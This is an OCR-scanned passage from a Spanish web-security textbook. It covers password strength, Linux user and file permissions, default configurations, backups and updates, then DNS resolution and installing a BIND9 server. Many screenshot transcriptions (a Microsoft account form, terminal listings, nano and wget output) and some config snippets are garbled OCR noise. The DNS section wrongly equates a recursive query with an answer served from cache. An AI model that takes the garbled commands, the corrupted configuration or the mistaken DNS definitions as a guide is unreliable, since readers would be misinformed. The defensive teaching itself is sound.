compuesta únicamente por letras, podríamos considerarla segura 
o, al menos, difícil de conseguir. 


CONTRASEÑAS FUERTES 


La longitud y complejidad de una contraseña son los factores claves para que sea segura. En lo posible 
hay que utilizar 14 caracteres o más, alternar entre mayúsculas y minúsculas e incluir números y símbo- 
los. Para recordarla, intentemos llevar algún orden. Por ejemplo, colocar los símbolos al final, incluir un 


número que nos resulte familiar y poner en mayúscula solo las vocales. 
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Va tenes una oyenta Microsoft? S usas Motmail. SkyDrive, Xbox UVE y queres pedr una dreccón de correo electrónico Outlook.com mueva Í 


¿Quién eres? 

Nombre 

Srta ena 

Peor de nacimiento 

a +] dócembre lol 199 ” 
Jero 


Mujer e 


¿Cómo quieres iniciar sesión? 
Mecmmtre de cuenta Microcom 


O outlcokcomar . 


Crea na cortar 


rorsosanenenos ) Las contraseñas deben tener 8 
CIRCIANOS COMO MiPIMO y 
contener al menos dos de los 

Vueha a esotor la contrameña uguentes elementos 
mayúsculas, minúsculas. 
números y simbolos. 


Si pierdes la contraseña, ¿cómo podemos ayudarte a 
restablecerta? 


Masmero de reelcrno 


Figura 17. Una contraseña con una longitud de 14 caracteres o más, 
conformada por letras, números y símbolos, tiene una fortaleza alta. 


Permisos de usuarios 


Pensemos en una empresa que cuenta con algunos empleados. Es 
probable que cada uno tenga a cargo tareas diferentes y que algunas 
sean más importantes que otras, según el nivel de privilegios y los 
permisos que tenga cada empleado para tomar decisiones en la 
empresa. Lo mismo sucede en un sistema donde tienen acceso varios 
usuarios: no todos tendrán los mismos permisos. 

En Windows, el usuario con mayores privilegios se denomina 
system, mientras que en Linux es el usuario root. Para obtener el 
control absoluto del servidor web, un hacker que ingrese al sistema 
hará todo lo posible por conseguir los privilegios del usuario root 


HO GESTIÓN DE USUARIOS Y GRUPOS 


En Linux, realizar este trabajo desde la terminal es algo sencillo, ya que disponemos de comandos fáciles 
de usar. Por ejemplo, adduser y addgroup para agregar usuarios y grupos respectivamente. El comando 
chown cambia el propietario de un archivo y chgrp cambia el grupo propietario. En internet encontraremos 


información detallada sobre el uso de estos comandos. 
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o system (según corresponda). Por este motivo, es muy importante 
que tales usuarios estén protegidos con contraseña y se utilicen 
únicamente para efectuar tareas administrativas. 


heyBus-shey:/var/uuww9 ls —1 

otal 8 

ru-r—r-— 1 misitio web 17? jul 11 04:54 index.html 
druxrxwr-x 2 shey web 4096 jul 11 05:46 
sheyBus-shey : /uvar/uuwS 


Figura 18. El comando 1s -1 nos muestra en la tercera columna el 
propietario del archivo/directorio, y en la cuarta, el grupo al que pertenece. 


Si creamos un usuario o grupo de usuarios con permisos limitados 
correremos menos riesgos de seguridad y, si un hacker logra obtener 
acceso mediante alguna de estas cuentas, no podrá realizar demasiados 
cambios en el sistema. No es necesario que un servicio web se ejecute 
bajo los permisos de root. 


Permisos de acceso a archivos 


En los sistemas Linux es posible controlar el acceso a los archivos a 
través de la asignación de permisos, que permiten prohibir o permitir 
a un usuario ver, modificar y/o ejecutar un archivo. Los permisos 
pueden diferenciarse entre los del propietario, el grupo y los demás 
usuarios. En el caso de los archivos, los tres permisos que pueden 
aplicarse son: lectura (R), escritura (W) y ejecución (X). 

Como vemos en la Figura 19, los permisos se indican a la 
izquierda de la terminal en una notación simbólica conformada 
por diez caracteres. El primer carácter indica qué tipo de archivo 
es: si consultamos un directorio, entonces será la letra d, o de lo 
contrario el símbolo -. 
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Z root root 1096 ene 25 
) root root 1096 jul 11 
Z root uhoopsie 1096 jul 11 
5 root root 4096 jul 11 
Z root staff 4096 ene 25 

root root 3 jul 11 
Z root root 4096 jul 11 
Z root mail 4096 jul 11 
Z root root 4096 jul 11 

root root 4 jul 11 


5 root root 4096 jul 11 


root root 4096 ene 25 


J root root 4096 jul 11 


vary 


Figura 19. Si queremos saber qué permisos tiene determinado archivo 
o directorio podemos hacerlo mediante el comando 1s -1. 


Restan nueve caracteres que se dividen en tres grupos: tres para 
el propietario, otros tres para el grupo y los últimos para el resto de 
los usuarios. Cada carácter representa un permiso diferente: de lectura, 
de escritura y de ejecución. Si la escritura del archivo está permitida se 
mostrará la W, de lo contrario un —; lo mismo sucede con los permisos 
de lectura y ejecución. 

Para que quede más claro, analicemos dos ejemplos: 

-rwxr-xr--: al propietario del archivo se le permite verlo, modificarlo 
y ejecutarlo, al grupo se le permite verlo y ejecutarlo pero no 
modificarlo, y al resto de los usuarios solo verlo. 

dr-xr--r--: directorio a cuyo propietario se le permite listar el 
contenido y accederlo, pero no crear o borrar archivos. Al grupo y a 
los demás usuarios solo se les permite listar el contenido. 


Modificar permisos 

Los permisos pueden modificarse mediante el comando chmod. 
Su uso es: chmod (opciones) farchivo). Las opciones son tres números: 
el primero hace referencia al propietario, el segundo al grupo y el 
tercero a los demás usuarios. La cifra de los números son los permisos 
otorgados, y se realiza una suma teniendo en cuenta lo siguiente: 
ejecutar = 1, escribir = 2, leer = 4. Si usamos el número cero (0) 
se anulan todos los permisos sobre el archivo. 
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Ejemplo: chmod 766 archivo. Con este comando, establecemos 
que el propietario del archivo tenga permisos de lectura, escritura 
y ejecución, mientras que el grupo solo posea permisos de lectura 
y escritura, al igual que el resto de los usuarios. 


/var/www9 ls —1 


misitio web 177 jul 11 04:54 index.html 
. shey web 4096 jul 11 05:46 

sheyBus-shey:/var/uwuwS sudo chmod 766 index.html 
sheyBus-shey:/var/uww$ ls -1 

total 8 

ruxru-ru- 1 misitio web 17? jul 11 04:54 

diruxr-xr-x 2 shey web 4096 jul 11 05:46 
sheyBus-shey:/uar/uwuwS 


Figura 20. Si le pasamos a chmod los parámetros 766 
le otorgaremos permisos de ejecución solo al propietario. 


Si hablamos de seguridad, aplicar permisos de acceso a los archivos es 
una medida con claras ventajas. Por ejemplo, si un hacker obtiene acceso 
a nuestro servidor web y entra a un directorio donde no tiene permisos 
de escritura, no podrá borrar ni crear nada nuevo. Si no tiene permisos de 
ejecución, no podrá ejecutar ningún archivo malicioso ni nada por estilo. 


Configuraciones por defecto 


Todos los programas traen una configuración predefinida que luego 
podemos modificar. Si no las editamos puede suceder algo similar a lo 
que pasa cuando dejamos las contraseñas por defecto, es decir, pueden 
ocasionarnos un serio problema de seguridad. 

Cuando instalamos el servidor HTTP Apache, los registros 
(logs) de acceso y error se guardan en una ruta especificada en las 
configuraciones por defecto. En el Capítulo 6 veremos una técnica de 
“envenenamiento” de logs donde el hacker necesitará conocer la ruta 
de estos archivos para concretar el ataque. Si no cambiamos dicha 
configuración, le facilitaremos el trabajo. 
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Figura 21. Mediante un error en la programación de la página 
podemos acceder a los logs si encontramos su ubicación. 


En los próximos capítulos veremos las configuraciones por defecto 
de todos los servicios que instalemos en nuestro servidor web y 
aprenderemos a modificarlas para mitigar los riesgos de seguridad. 


Reducción y distribución de servicios 


Es cierto que en un servidor web necesitamos instalar varios 
servicios, como el servidor HTTP, el servidor DNS o las bases de datos. 
Pero debemos saber que, cuantos más servicios ejecutándose tengamos 
en nuestro servidor, más fácil será que aparezcan vulnerabilidades. 

Cada programa cuenta con sus propios agujeros de seguridad 
(bugs), por lo tanto, para minimizar riesgos, es una buena idea 
reducir la máxima cantidad posible de servicios (lo que debe 
considerarse aún más si usamos como sistema operativo alguna 
distribución que deba ser adaptada para un servidor web, a diferencia 
de Ubuntu Server que ya viene preparada). 


INFORMACIÓN EN ESPAÑOL 


El sitio web Hispasec (www.hispasec.com) contiene abundantes noticias e interesante información 
relacionada a la seguridad informática. Mediante la suscripción al servicio “Una al día”, se envía por 
correo electrónico una noticia por día relacionada con la seguridad. 
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A los servicios que sí se usan podríamos 
SIEMPRE distribuirlos entre varios servidores. Sería ideal 
DEBEMOS TENER ejecutar un sólo servicio en cada servidor pero, 
por supuesto, el presupuesto para contar con 
UN BACKUP tantos servidores sería muy alto. Una opción 
COMO MEDIDA DE más accesible es optar por máquinas virtuales. 
Una máquina virtual, como vimos antes, 


PROTECCIÓN BÁSICA es un software que emula un equipo al cual 


podemos instalarle el sistema operativo que 
E he queramos y ejecutar sobre éste cualquier 
programa. Esta computadora virtual está aislada de la máquina 
física, por eso resulta ideal para distribuir servicios. 


Mato 
0) o 


e 


VMware” Workstation 8 a] 


Figura 22. VWiware Inc. provee una amplia variedad 
de software de virtualización, tanto pagos como gratuitos. 


Respaldo de información 


Quizás el simple hecho de pensar en perder absolutamente toda 
la información que tengamos en nuestro servidor nos dé escalofríos. 
Antes de que una persona malintencionada entre a nuestro sistema 
y borre todo, debemos hacer un backup o copia de seguridad. 

Para empezar, copiaremos toda la información a una unidad de 
almacenamiento de datos, por ejemplo un disco duro externo. Luego 
será cuestión de mantener sincronizados todos los archivos del 
servidor web con los del backup. 
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Hoy en día existen programas que realizan esta tarea de modo 
automático y continuo, sin interferir en las actividades que se estén 
llevando a cabo en el sistema. Algunos, además, incluyen cifrado de datos, 
lo que hace mucho más seguro el envío y almacenamiento de información. 


Figura 23. Un disco duro externo guardará nuestra información 
de una manera más segura que una memoria flash. 


Actualizaciones 


Tanto el sistema operativo como los programas que instalamos 
en él están en permanente actualización. Estas mejoras y parches 
muchas veces tienen que ver con soluciones a problemas de seguridad, 
por lo cual es muy importante que estemos pendientes y los 
apliquemos cuanto antes. 


La Coordinación de Emergencias en Redes Teleinformáticas de la República Argentina (www.arcert. 
gov.ar) es un equipo de respuesta ante emergencias teleinformáticas. En su sitio web podemos ver los 
objetivos que persigue y su modo de actuar ante incidentes de seguridad. Además, contiene recursos y 
enlaces con información interesante respecto a seguridad, y reportes de incidentes en el sector público. 
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:/9 sudo aptitude safe-upgrade 
rá, actualizará o eliminará ningún paquete. 
os, O nuevos instalados, O para eliminar y 0 sin actualizar 


ecesito descargar 0 B de archivos. Después de desempaquetar se usarán 0 B 


sheyBus-shey:/9S _ 


Figura 24. Con el comando aptitude update 
88: aptitude safe-upgrade podemos actualizar Ubuntu Server. 


Además de las actualizaciones automáticas 


ES OBLIGATORIO del software que tenemos instalado, es 

ESTAR SIEMPRE prácticamente obligatorio estar informados 
acerca de las últimas novedades en el mundo 

INFORMADOS Y de la seguridad informática. 

ACTUALIZAR EL Si en un determinado momento es 


descubierto algún agujero de seguridad en el 
SOFTWARE INSTALADO software que estamos utilizando, debemos estar 
alertas y tomar las medidas necesarias para 


a he evitar que sea aprovechado en nuestro sistema. 


- INFORMACIÓN EN INGLÉS 


Security Tube (www.securitytube.net) es un sitio que contiene videos que están especificamente 
relacionados con la seguridad de la información. Otra fuente donde obtener este tipo de contenidos 
es SecurityFocus (www.securityfocus.com), un conocido sitio de seguridad donde se tratan te- 


mas de alto nivel. 
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Figura 25. Segu-Info (www.segu-info.com.ar) 
es un blog argentino que contiene información, 
noticias, eventos y foros sobre seguridad informática. 


uu Y 


aa RESUMEN 


En este primer capítulo nos hemos introducido en la seguridad informática a partir de la definición de 
conceptos básicos pero indispensables. Conocimos a los hackers, su historia, su ética y su modo 


de pensar. Instalamos un servidor web desde cero para alojar nuestros códigos de ejemplo y realizar 
pruebas de seguridad. También aprendimos a crear contraseñas seguras y a administrar permisos 
de usuarios y archivos. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


1] ¿Por qué es importante la seguridad informática aplicada al campo web? 
2 ¿Quién es un hacker? 


3 ¿Cuáles son los tipos de comportamientos que puede tener un hacker? A partir 
de esto, ¿con qué nombres se los clasifica? 


4 ¿Cuál es la diferencia entre Ubuntu Server y otras distribuciones genéricas de 
GNU/LINUX? 


5 ¿Qué características debe tener una contraseña para considerarla segura? 
6 ¿Cuál es el usuario con mayores privilegios en Windows? ¿Y en Linux? 


7 ¿De qué modo se indican los permisos de un archivo/directorio en una terminal 
Linux? ¿Cómo se pueden modificar? 


EJERCICIOS PRÁCTICOS 


Instale un servidor web con Ubuntu Server o el sistema operativo que prefiera. 
Cree una contraseña segura para cada aplicación/servicio. 
Cree usuarios/grupos y limite sus privilegios. 


Modifique los permisos de acceso a archivos. 


0d bb Y N 


Modifique las configuraciones por defecto de las aplicaciones que instaló en el 
servidor web. 


rs PROFESOR EN LÍNEA 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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Los servidores DNS cumplen un papel muy importante 

en el mundo de internet. En este capítulo analizaremos 
detalladamente su estructura y funcionamiento. Se explicará 
cómo instalar un servidor DNS Bind9 y obtener información 
mediante consultas a sus registros, utilizando las herramientas 
Dig y Nslookup. Luego aprenderemos técnicas más avanzadas 
de extracción de datos útiles para un ataque y tomaremos las 


medidas adecuadas para proteger los servidores DNS. 


w Historia y funcionamiento... 42 w Técnicas de extracción : 


COMAS at 69 

w Instalación de un 
servidor BIND9 .....ooocccccccnncano co 52 Y RSU Olnmcornccorceios cas rocnconoriontos 8l 
w HerramientaS ...occcccnnnnnnnronnenonnos 61 w ActividadeS......ooonnmmmmmmmass*”*m”m.*s.sm” 82 


AAA 


www.detodoprogramacion.com 


¡VE USERS 2. SERVIDORES DNS 


Historia y funcionamiento 


Cada vez que navegamos en internet en busca de información, 
consultamos el clima, revisamos las noticias del día e ingresamos a 
nuestro correo electrónico, hacemos uso del protocolo DNS (Domain 
Name System o, en español, Sistema de Nombres de Dominio). 
Debido a su constante presencia, podemos estar seguros de que este 
protocolo cumple un papel fundamental en el mundo de internet. 

En esta primera sección vamos a explicar cómo funciona el DNS. 
Analizaremos qué es lo que sucede cada vez que escribimos el nombre 
de un sitio web en nuestro navegador y, más adelante, en qué puede 
afectar este asunto a la seguridad de nuestro sistema. 


Necesidad de los DNS 


Cada servidor web conectado a internet tiene una dirección 
IP única que lo identifica en la red. Imaginemos si tuviéramos que 
memorizar las direcciones IP de cada una de las páginas que visitamos 
en internet, sería realmente difícil. Por este motivo se inventaron los 
nombres de dominio, que permiten escribir en nuestro navegador 
“"www.google.com” en lugar de “173.194.42.18” (IP de Google). 


173144214 


Google 


Figura 1. Si introducimos la IP de Google en nuestro navegador 
obtenemos el mismo resultado que al ingresar su nombre de dominio. 
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Otra ventaja de los nombres de dominio es que no debemos 
preocuparnos por si Google cambia la IP de su servidor web, ya que los 
DNS se encargarán de actualizar esa información. Por lo general, resulta 
más fácil memorizar palabras que números, lo que volvió necesario 
inventar un sistema que hiciera la navegación en internet más cómoda 
e intuitiva para los humanos, reemplazando estos números por palabras. 


Tipos de servidores DNS 


El DNS es una base de datos, distribuida en servidores alrededor del 
mundo, que contiene información asociada a los nombres de dominio 
y sus respectivas direcciones IP. 

Cuando ingresamos el nombre de un sitio web en nuestro navegador 
realizamos una consulta como la siguiente: “¿Cuál es la dirección IP 
de www.dominio.com?”. Esta consulta es enviada, en primera instancia, 
al caché DNS local que se encuentra en nuestro sistema operativo. 

El caché almacena copias de las consultas anteriormente realizadas, 
de modo que no sea necesario repetir el proceso de resolución de un 
dominio si ya lo hemos hecho antes. 


¿Cúal es la IP 
de www.google.com? 


173,194,42.18 


AD 


SISTEMA OPERATIVO 


Figura 2. El sistema operativo, antes de comunicarse con un servidor DNS, 
verifica si la respuesta a la consulta realizada se encuentra en su memoria caché. 


En caso de que nuestra petición no sea encontrada en la memoria 
caché, será enviada a un servidor DNS primario, cuya dirección está 
especificada en nuestro sistema operativo. Suele estar configurado 
el servidor de nuestro proveedor de internet (ISP, Internet Service 
Provider), a menos que hayamos cambiado manualmente la dirección 
por la de otro proveedor. 
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Es correcto pensar que el servidor DNS primario de un ISP tendrá 
una caché bastante completa, si tenemos en cuenta que es un servidor 
en común para miles de usuarios a los cuales respondió sus consultas. 
Es lógico que las páginas webs populares, como las de Google, Hotmail, 
Yahoo, ya estén almacenadas en su caché. 

Quizás estemos pensando en lo siguiente: si un servidor 
DNS primario es consultado por miles de usuarios de un ISP, ¿qué 
sucedería si éste se cayera o quedara temporalmente fuera de servicio? 
¿Quedarían todos los usuarios sin acceso a internet? No. Si algo de eso 
ocurriera y el primario quedará fuera de servicio, nuestra consulta 
sería enviada a un servidor DNS secundario del ISP, es decir, a un 
servidor auxiliar o de respaldo. 


¿Cúal es la IP 
de www.dominio.com? 
¡$_EA 


Servidor DNS 
primario 


$ 


PC usuario A ree ep cd 


¿Cúal es la IP 
de www.dominio.com? 


216.34.94.183 


Servidor DNS 


secundario 


Figura 3. En caso de que el servidor DNS 
primario se encuentre fuera de servicio, 
la consulta será enviada al servidor DNS secundario. 


DN PROTOCOLO UDP 


Si bien el protocolo DNS puede funcionar tanto con TCP como con UDP, se utiliza más con UDP. Este es 
un protocolo NO orientado a conexión, lo que significa que no requiere que se establezca una conexión 
entre el cliente y el servidor para transferir datos, sino que se envían directamente. Si bien esto lo hace 


más rápido, a la vez resulta más inseguro. 
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Consultas del cliente al servidor 


Cuando visitamos un sitio web, por lo general podemos visualizar 
su contenido rápidamente. Con esto en mente, es probable que no nos 
imaginemos el recorrido que podría llegar a realizar nuestra consulta 
para hallar una respuesta. 

A partir de ahora analizaremos detalladamente qué es lo que 
ocurre cada vez que realizamos una consulta de traducción (traducir 
el nombre de dominio a dirección IP). Por ejemplo, a través de nuestro 
navegador web visitando la página de noticias del día. 


Consulta recursiva 

La consulta recursiva es la que obtiene la respuesta más rápida, 
debido a que su proceso es bastante simple y se realiza sin demoras. 
Podríamos comparar este tipo de consulta con la búsqueda de un 
objeto del cual conocemos la ubicación. Por ejemplo, si necesitamos 
usar nuestro celular y recordamos que lo dejamos en otra habitación 
arriba de la mesa, como sabemos dónde está, será fácil ir a buscarlo 
y lo haremos rápido, sin demoras. 

La consulta recursiva, entonces, se trata de la ya mencionada 


memoria caché. Nuestra petición ya se ha realizado antes, sea por otras 


personas o por nosotros mismos, por lo tanto está almacenada en la 
caché del servidor DNS y obtendremos una respuesta rápida. 


¿Cúal es la IP 
de www.facebok.com? = 


cl. o 
<S 31.13.66.49 de 
AAA Servidor DNS 
PC cliente del 1.S.P. 


Figura 4. Cuando la respuesta a nuestra consulta se encuentra en la caché 
del servidor DNS, nos encontramos con una consulta recursiva. 


Ahora bien, tal como cuando no recordamos dónde hemos dejado 
nuestro celular, ¿qué ocurre cuando nuestra consulta no está en la 
caché del servidor DNS al cual se la enviamos? Es preciso buscarla, 
lo que quizás demore un poco más de tiempo. 
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Consulta iterativa 

La consulta iterativa es más lenta que la recursiva, ya que conlleva 
un proceso de resolución de nombres que, en un principio, puede 
sonar complejo. Aun así, al finalizar este primer tema del capítulo, 
quedará entendido. 

Imaginemos que hacemos la siguiente consulta al servidor DNS de 
nuestro ISP (o al que tengamos configurado): “¿Cuál es la IP de www. 
dominioextraño.mw?” En caso de que encuentre la respuesta en su 
caché, nos responderá y la consulta será recursiva. Si no la encuentra, 
el servidor DNS de nuestro ISP consultará a varios servidores DNS, con 
el objetivo de resolver el dominio. 


Consulta 


Respuesta 


Consulta 
Respuesta 
Servidor DNS 
del 1.S.P. 
| Consulta 


Respuesta 


Servidores 
DNS 


Figura 5. Si la respuesta a nuestra consulta no se encuentra en la caché 
del servidor del ISP, éste consultará a otros servidores DNS. 


Existen millones de dominios en internet, pero nosotros estamos 
preguntando la IP de solo uno de ellos. Tengamos en cuenta que, 
como mencionamos en un principio, el DNS es una base de datos 
distribuida, es decir que el servidor DNS de nuestro ISP no podrá 
consultar tan solo uno de los tantos servidores DNS existentes y recibir 
una respuesta. La cuestión es: ¿cómo sabe el servidor del ISP a qué 
servidores DNS debe consultar? ¿Existe algún orden? 
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Estructura jerárquica 


Mantener coherencia en una base de datos distribuida en 
servidores DNS alrededor de todo mundo puede sonar complicado, 
y más si sabemos que los datos que contiene se modifican, aparecen y 
desaparecen constantemente. Pero no hay otra opción, ya que un solo 
servidor DNS para millones de usuarios en internet jamás podría 
soportar todo el tráfico que pasaría sobre él. La solución al problema 
fue implementar una estructura jerárquica en forma de árbol, tal como 
puede apreciarse en la Figura 6. 


Figura 6. El DNS es una base de datos distribuida 
en servidores DNS alrededor del mundo; para mantener 
una coherencia, se empleó una estructura arborescente. 


En el nivel más alto está el dominio raíz o root, representado por 
un punto (.). Cada uno de los servidores DNS raíz contiene una base de 
datos con las direcciones IP de los servidores del nivel inferior, es decir, 
de los dominios .com, .org, .net, etcétera. En la Figura 7 podemos 
observar una representación del contenido de estos servidores. 


D EXTENSIÓN DE DOMINIOS POR PAÍSES 


La extensión del dominio puede cambiar según el país del sitio web, por ejemplo, .com.ar corresponde 
a Argentina. En internet hay sitios web que muestran un listado completo de estas extensiones, y algunas 
de ellas pueden resultar curiosas: mw (Malawi), aq (Antártida), tz (Tanzania), tv (Tuvalu), entre otras. 
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Datos de un servidor DNS raíz 


.com 
135.40.213.56 
13521,18.132 
190.43.77.215 
.net 
132.253.123.89 
129.197.224.61 
154.64.222.124 
IA i2 3232 
.0rg 
131.23.109.229 
190.34.213.131 
LIO 222 ZO ZO 


Figura 7. Los servidores raíz solo contienen las direcciones IP 
de los servidores DNS de los dominios .com, .net, .org, etcétera. 


Como podemos observar, cada una de esas direcciones IP corresponde 
a un servidor DNS de uno de esos dominios, también llamados dominios 
TLD (Top Level Domain), que están por debajo del raíz. 

La información que contienen esos servidores DNS es similar a la 
de los servidores raíz, pero las direcciones IP serán de los servidores del 
nivel inferior. 

Un servidor del dominio .com tendría una base de datos con las IP 
que corresponden a cada servidor DNS de los dominios inferiores al TLD 
.com. Por ejemplo, facebook.com, redusers.com, etcétera. 


DN RFC DEL PROTOCOLO DNS 


Los RFC (Request For Comments) son documentos detallados sobre los protocolos de internet. Quien lo 
desee puede escribir una propuesta y enviársela a la IETF (Internet Engineering Task Force), quien deci- 
dirá si la propuesta pasa a ser un RFC y quizás, en el futuro, un estándar de internet. El RFC en español 
del protocolo DNS es www.rfc-es.org/rfc/rfc1034-es.txt. 
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Datos de un servidor DNS del dominio .com 


google.com 
74.125.157.104 
74.126.205.105 
80.127.109.106 
facebook.com 
69.63.181.12 
69.73.123.67 
81.90.191.45 
81.34.98.127 
redusers.com 
98.129.229.238 
98.234.148.131 
73.148.213.132 


Figura 8. Los servidores de los TLD contienen las direcciones IP 
de los servidores DNS del nivel inferior, por ejemplo, google.com. 


Ahora bien, llegamos al extremo final del sistema de jerarquía 
DNS con estructura de árbol. 

Los servidores de este nivel contienen las direcciones IP de 
las máquinas específicas del dominio consultado para que el sistema 
funcione, por ejemplo, del servidor web e intercambio de correo (tal 
como se muestra en la Figura 9). 

Se trata, en síntesis, de un sistema complejo pero necesario para 
el correcto funcionamiento de internet, para que no haya demoras 
cada vez que se solicita la resolución de un dominio. 


D ARCHIVO HOSTS 


El contenido de este archivo puede leerse con un editor de texto como Notepad y su ubicación varía 
según el sistema operativo (en Windows, la ruta suele ser la siguiente: CAWINDOWSIsystem32Wriversletcl 
hosts). Cada vez que entramos a una web, este archivo es consultado, ya que contiene direcciones IP y 
nombres de dominio, y puede ser usado para bloquear sitios web no deseados. 
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Datos de un servidor DNS del dominio google.com 


www.google.com 
173.194.43.51 
173.194.30.25 
173.194.50.73 
mail.google.com 
173.194.41.53 
173.194.22.89 
173.194.39.21 
173.194.10.96 
maps.google.com 
173.194.40.33 
173.194,73.15 
173.194.24.48 
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consulta se envía a uno de ellos. El servidor raíz le responde al ISP con 
la lista de todos los servidores DNS del TLD consultado (en este caso, 
el .com). Se elige una IP para continuar con el proceso de resolución y 
la consulta es enviada a uno de esos servidores, que responde que el 
servidor DNS ns0.redusers.com tiene autoridad sobre redusers.com 
(pueden ser uno o varios servidores). 

Finalmente, la consulta se envía a este último servidor DNS, que 
responde con la IP de una máquina específica (en este caso, del sitio 
www.redusers.com). Este proceso de resolución de nombres puede 
observarse en la Figura 10. 


O 


www.redusers.com 


lista de servidores.com 


| Servidor 


Eres 


www.redusers.com www.redusers.com 
AMA 


—_— 
ns0.redusers.com 
8 98.129.229.238 (216.69.185.50) 
Ss — —_ _——_—_—_———— 
Servidor 
del 1.S.P. '0) 
| www.redusers.com 


98.129.229.212 


ns0.resusers.com 


Figura 10. Cuando se realiza una consulta iterativa se lleva 
a cabo el proceso de resolución de nombres. 


DN DNS EN TODAS PARTES 


No solo cuando navegamos en internet visitando páginas web, portales y foros hacemos uso de los DNS, sino 
también cuando ingresamos a nuestro correo electrónico, ya que posee un nombre de dominio (gmail.com, 
hotmail.com o cualquier otro). Prácticamente en todo lo que realizamos en internet hacemos uso de los DNS. 
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Instalación de un 
servidor BIND9 


En el capítulo uno hemos instalado un servidor web con Ubuntu 
Server. En esta sección, vamos a instalar BINDO9, el servidor DNS más 
utilizado en internet. La organización ISC (Internet Systems Consortium) 
se ocupa del mantenimiento de BIND y en su sitio web (www.isc.org) 
podemos obtener este software. 


Downioacs 


Onwniosé BINO 


Figura 11. www.isc.org/download es la página 
de descargas de los productos desarrollados por ISC, 
donde encontramos la última versión de BIND. 


Como puede observarse en el sitio web, la descarga está disponible 
tanto para Windows como para sistemas Unix/Linux, ya que se dispone 
del código fuente para ser compilado. 

A continuación, en la próxima sección, se explicará la instalación 
y compilación de BIND9 en Ubuntu Server. 


Pasos para la instalación de BIND9 


En el siguiente Paso a paso veremos cómo instalar BINDO9. 
Tendremos que descargar el código fuente, crear los directorios 
de instalación y compilar BIND con los parámetros indicados. 
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PAP: INSTALACIÓN DE BIND9 


Para descargar BIND desde la terminal de Ubuntu Server use el comando wget 

0 1 http://ftp.isc.org/isc/bind9/9.9.3/bind-9.9.3.tar.gz. Obtendrá 
un archivo .tar.gz, que debe descomprimir con tar -zxvf bind-9.9.3.tar. 
gz. La dirección URL de descarga y el nombre del archivo pueden variar según la 
versión de BIND. 


sheylubuntu:”$ uget http: /ftp.isc.org/isc/bind9/9.9.3/bind-9.9.3.tar.gz 
2013-08-19 23:08:40— http://ftp.isc.org/isc/bind9/9.9.3/bind-9.9.3.tar.gz 

Resolviendo ftp.isc.org (ftp. isc.org) 204 .152.184.110 

Conectando con ftp.isc.org (ftp. isc.org)[204.152.184,110]:80 conectado 

Petición HTTP enviada, esperando respuesta 2068 OK 

Longitud: 7459387 (7,1M) lapplicationrx-9z ip] 

Grabando a: sbind-9.9.3.tar.gzu 


10071 ===========================2===o=====> >] 7.459.387 625K's en 38s 
2013-08-19 23:09:21 (191 KBss) abind-9.9.3.tar.gzs guardado [7459387/7459387 1 


sheyRlubuntu:”$ tar —owf bind-9.9.3.tar.gz 


2 Antes de compilar asegúrese de que tiene instalado el compilador GCC. En caso de no 

0 tenerlo, instálelo con el comando apt-get install gcc. Cree los directorios de 
instalación ejecutando la siguiente línea: mkdir /usr/local/bind € mkdir 
/usr/local/bind/var € mkdir /usr/local/bind/etc. Estos 
directorios serán especificados luego como parámetro en la configuración. 


shey%ubuntu:”S sudo apt get install gcc 

Leyendo lista de paquetes Hecho 

Creando árbol de dependencias 

Leyendo la información de estado Hecho 

gec ya está en su versión nás reciente 

B actualizados, 0 se instalarán, 0 para elininar y 68 no actualizados 
shey?ubuntu:7S sudo mkdir /usr/local/bind 

sheyRubuntu : do mkdir /susr/localsbind/var 

sheyPubuntu: $ sudo mkdir /usr/local/bindrete 

sheyB%ubuntu :7$ 
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Muévase a la carpeta donde descomprimió BIND y especifique los parámetros 

de configuración con el comando que sigue: ./configure --prefix=/usr/ 
local/bind --sysconfdir=/usr/local/bind/etc 
--localstatedir=/usr/local/bind/var. Por último, ejecute make ¿e 


make install para finalizar la instalación. 
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Dentro de este archivo debemos descomentar la línea forwarders 
y agregar las direcciones IP de los servidores DNS de nuestro ISP: 


forwardersí 
186.130.128.55 
200.63.155.98 
y; 


GNU nano 2.2.6 firchivo: /etc/bind/naned .conf .options 


ption 
directory “/uar/cachesbind” 


If there is a fireuall betueen you and naneservers you want 
to talk to, you may need to fix the fireuall to allow multiple 
ports to talk see http www .kb. cert. .org/vuuls/14/900113 


If your ISP provided one or more 1P addresses for stable 
noneservers, you probably vuant to use then as foruarder 
Uncomment the following block, and insert the addresses replac ing 


the al1-0's placeholder 


foruarder 


If BIND logs error nessages about the root key being expired, 


you wí11 need to update your keys See http www. isc. .org/bind-key 


dnssec-validation auto 


auth-nxdoma in no conforn to RFC1035 
listen-on-v6 1 any 
[ Z7 líneas leídas 1] 
Guardar sl Leer Fich RePág í Cortar TexfMMl8 Pos actual 
Justificar Bu Pág PegarTxt Ortografía 


£ Ver ayuda 


Figura 12. Editamos el archivo named. conf .options 
para agregar las IP de los servidores DNS del ISP. 


A continuación, modificaremos el archivo dhclient.conf para que 
nuestro servidor DNS funcione con IP dinámica. Ejecutamos el comando 


- PARÁMETROS DE CONFIGURACIÓN 


Es importante destacar que si instalamos BIND9 manualmente podremos pasarle más parámetros 
de configuración que solamente los directorios de instalación. Por ejemplo -disable-ipv6 desactiva el 
soporte para IPV6, -enable-threads o -—disable-threads activan o desactivan los threads, respectivamente, y 


-—with-libtool indica que se usarán las librerías de GNU. 
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nano /etc/dhcp/dhclient.conf para editarlo y descomentamos la siguiente 
línea: prepend domain-name-servers 127.0.0.1;. 

Es necesario modificar la IP 127.0.0.1 por la de nuestro servidor 
DNS, que en este caso será 192.168.0.111. 

Llegado el momento de crear las zonas, editaremos el archivo 
named.conf.local ubicado en /etc/bind. Nos situamos en esa carpeta y 
ejecutamos el comando nano named.conf.local. Aquí agregamos la zona 
para el dominio hackersenlaweb.net y el código para que funcione 
la resolución inversa: es decir, si preguntamos por la IP 
del servidor, la respuesta debe ser el dominio que creamos. 


zone “hackersenlaweb.net”( 

type master; 

file “/etc/bind/db.hackersenlaweb.net”; 
y; 


zone “0.168.192.in-addr.arpa”£ 
type master; 
file “/etc/bind/db.192.168.0”; 
y; 


Se indican los archivos de configuración de cada zona, que más 
adelante crearemos. 

Vemos que en la última zona aparece la dirección IP del servidor 
DNS, pero invertida y sin el último número (lo cual es correcto). 
Finalmente, el archivo queda tal como se ve en la Figura 13. 


DN REVISTAS HXC 


Estas revistas fueron escritas hace ya varios años, sin embargo, algunos artículos siguen siendo útiles 
en nuestros días. Son populares por la buena explicación que brindan de cada tema que presentan. En 
